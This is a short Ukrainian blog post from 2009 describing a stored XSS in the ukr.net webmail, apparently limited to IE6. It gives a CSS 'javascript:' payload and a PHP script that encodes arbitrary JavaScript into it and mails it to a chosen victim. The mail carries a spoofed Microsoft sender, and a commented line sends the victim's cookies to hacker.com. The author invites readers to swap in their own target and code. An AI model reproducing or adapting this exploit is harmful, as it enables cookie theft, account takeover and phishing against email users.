Home > Безпека > Active XSS на пошті ukr.net

Active XSS на пошті ukr.net

June 3rd, 2009 Dimi4 Leave a comment Go to comments

В травні місяці довелось мені переглянути вихідний код одного листа на укр неті. І побачив я одну цікаву особливість, а саме,  текст листа був у такому вигляді:

  1. <script>    messageBody = ‘\nPew pew!’;
  2.     readmsgSetMessageBody();
  3.     </script>

Вже в голові закрутились думки про XSS =) . Покопався ще трохи, та дійшов до такого коду:

<font style="background:url\(javas/**/cript:eval(String.fromCharCode(
[evil encoded code])))">

Мінусом є те, що працює лишень в IE 6
Для зурчності написав невеличкий скрипт для відправки:

  1. <?php
  2. /**
  3.  * (c) Dimi4, 2009
  4.  *
  5. */
  6. $target = "petya@ukr.net";
  7. $subj = "Pew pew!";
  8. $payload ="";
  9. $evilcode="alert(1);"; //img = new Image(); img.src = "http://hacker.com/sniffer/s.gif?"+document.cookie;
  10. $strlen= strlen($evilcode);
  11.         for($i=0; $i !== $strlen; $i++)
  12.         {
  13.             if($i+1 == $strlen) $payload .= ord($evilcode[$i]);
  14.             else $payload .= ord($evilcode[$i]).‘,’;
  15.         }
  16. $header  = "From: support@microsoft.com\r\n";
  17. $header .= "MIME-Version: 1.0\r\n";
  18. $header .= "Content-Type: text/html\r\n";
  19. $msg =‘<font style="background:url\(javas/**/cript:eval(String.fromCharCode(‘.$payload.‘)))">’;
  20. mail($target,$subj,$msg,$header);
  21. ?>

Змінюєм $target та $evilcode і вуаля! ))
© Dimi4

Categories: Безпека Tags: , ,
  1. ололо
    June 24th, 2009 at 22:21 | #1
    Reply | Quote

    Хакір!1

  1. No trackbacks yet.